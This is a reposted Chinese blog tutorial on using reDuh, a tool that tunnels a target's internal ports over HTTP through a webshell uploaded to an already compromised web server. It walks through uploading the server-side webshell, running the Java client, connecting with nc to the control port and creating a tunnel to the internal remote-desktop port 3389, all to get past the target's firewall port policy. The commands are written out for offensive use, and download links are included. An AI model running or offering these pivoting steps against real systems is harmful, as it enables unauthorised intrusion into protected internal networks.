原文链接: http://www.fendou.info/network/webshell-proxy-reduh.html
reDuh是可以把内网服务器的端口通过http或https隧道转发到本机,形成一个TCP连通回路,用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部端口的工具。
reDuh和LCX类似,都可以将内网端口映射到本机,reDuh和LCX不同的地方就是reDuh不需要本地电脑拥有外网IP,在某些本地内网做了端口策略的环境中LCX就无用武之地了。
reDuh是sensepost网站发布的,reDuh与LCX不同,它包含两个部分,Java版本的本地客户端和webshell服务端,其中服务端针对不同的服务器又分为aspx,php,jsp三个版本。
reDuh的使用方法很简单,首先描述一下使用环境
1.拥有目标服务器网站的通用webshell,用于上传reDuh服务端
2.知道目标服务器开放的内网端口,如远程桌面的端口是3389
3.目标服务器网络做了端口策略,只允许外部访问内网的80端口
如上图所示,防火墙后面的任意一台都可以成为我们的目标服务器,我们假设那台Windows服务器开放了Web服务,并且取得了Webshell权限。按照以下步骤操作就可以通过reDuh建立的TCP连通回路从外网连接到防火墙内目标服务器的任意端口。
1.把服务端的webshell上传到目标服务器。
2.确认目标服务器开放的端口,这里以远程桌面为例。
3.在本地命令行下用客户端连接服务端 E:\test>java reDuhClient 目标服务器域名 http 80 /WEBSHELL路径/reDuh.aspx
4.在本地用NC连接1010端口 H:\>nc -vv localhost 1010 提示”Welcome to the reDuh command line” 表示连接成功
5.输入reDuh命令 >>[createTunnel]1234:127.0.0.1:3389
前面的1234是本机连接用的端口,中间的ip地址是目标服务器的(可以是webshell所在服务器也可以是和它同内网的服务器),后面的3389是欲连接目标服务器的端口。
成功后两个命令行窗口都会有成功提示。
6.这时通道已经建立,你连接本机的1234端口 mstsc 127.0.0.1:1234就相当于连接到目标服务器的3389端口了。
7.命令行会显示数据传输
reDuh客户端下载 reduhclient-0.3.zip
reDuh服务端下载 reduh-server-all.gz